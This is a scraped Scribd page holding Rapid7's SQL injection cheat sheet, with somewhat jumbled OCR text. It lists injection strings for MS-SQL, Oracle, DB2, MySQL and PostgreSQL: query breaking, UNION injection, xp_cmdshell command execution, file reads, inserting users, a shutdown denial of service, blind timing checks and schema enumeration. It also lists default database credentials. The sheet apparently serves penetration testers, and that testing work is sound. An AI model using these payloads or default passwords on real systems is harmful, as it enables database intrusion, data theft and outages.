Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd
Upload
290 views

R7 SQL - Injection - Cheat - Sheet.v1 PDF

This document provides a cheat sheet of common SQL injection commands that can be used to discover information about and attack backend databases like Microsoft SQL Server, Oracle, IBM DB2, and MySQL. It lists commands to retrieve the database version, list users, tables, columns, the current user, add a new user, cause denial of service, and more. The summary also includes some common default usernames and passwords for different database systems.

Uploaded by

Alhadi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
290 views

R7 SQL - Injection - Cheat - Sheet.v1 PDF

This document provides a cheat sheet of common SQL injection commands that can be used to discover information about and attack backend databases like Microsoft SQL Server, Oracle, IBM DB2, and MySQL. It lists commands to retrieve the database version, list users, tables, columns, the current user, add a new user, cause denial of service, and more. The summary also includes some common default usernames and passwords for different database systems.

Uploaded by

Alhadi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

Common SQL Injection Commands for Backend Databases

SQL INJECTION CHEAT SHEET MS-SQL


www.rapid7.com Grab version @@version
Users name FROM master..syslogins
SQL Injection Discovery Tables name FROM master..sysobjects WHERE xtype = U
Common SQL Injection Attack Strings Database name FROM master..sysdatabases;
Query syntax breaking Single Quote(), Double Quote() Columns name FROM syscolumns WHERE id = (SELECT id
Injection SQL comment Hyphens (--), Hash(#), Comment(/*) FROM sysobjects WHERE name = <TABLENAME)

Extending/Appending queries Semicolon (;) Running User DB_NAME()

Injecting/Bypassing filters CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CON- Oracle


VERT(), NULL Grab version table v$version compare with Oracle%
Common SQL Injection Commands Users * from dba_users
Injecting Union Union all select NULL (Multiple columns) Tables table_name from all_tables
Running Command 1;exec master..xp_cmdshell dir>C:\inetpub\ww- Database distinct owner from all_tables
wroot\dir.txt OR master.dbo.xp_cmdshell
Columns column_name from all_tab_columns where table_
Loading Files LOAD_FILE(), User UTL_FILE and utfRead- name=<TABLENAME>
fileAsTable
Running User user from dual
Adding user 1; insert into users values(nto,nto123)
IBM DB2
DoS 1;shutdown
Grab version Versionnumber from sysibm.sysversions;
Fetching Fields select name from syscolumns where id =(select
id FROM sysobjects where name = target table Users user from sysibm.sysdummy1
name) (Union can help)Co Tables name from sysibm.systables
Common Blind SQL Injection Commands Database schemaname from syscat.schemata
Quick Check AND 1=1, AND 1=0 Columns name, tbname, coltype from sysibm.syscolumns
User Check 1+AND+USER_NAME()=dbo Running User user from sysibm.sysdummy1
Injecting Wait 1;waitfor+delay+0:0:10 MySQL
Check for sa SELECT+ASCII(SUBSTRING((a. Grab version @@version
loginame),1,1))+FROM+master..
sysprocesses+AS+a+WHERE+a.spid+=+@@ Users * from mysql.user
SPID)=115 Tables table_schema,table_name FROM information_
Looping/Sleep BENCHMARK(TIMES, TASK), pg_sleep(10) schema.tables WHERE table_schema != mysql
AND table_schema != information_schema
Default Usernames/Passwords
Database distinct(db) FROM mysql.db
Oracle scott/tiger, dbsnmp/dbsnmp
Columns table_schema, column_name FROM information_
MySQL mysql/<BLANK>, root/<BLANK> schema.columns WHERE table_schema != mysql
PostgreSQL postgres/<BLANK> AND table_schema != information_schema AND
table_name == <TABLENAME>
MS-SQL sa/<BLANK>
Running User user()
DB2 db2admin/db2admin
PostgreSQL
Grab version version()
Users * from pg_user
Database datname FROM pg_database
Running User user;

You might also like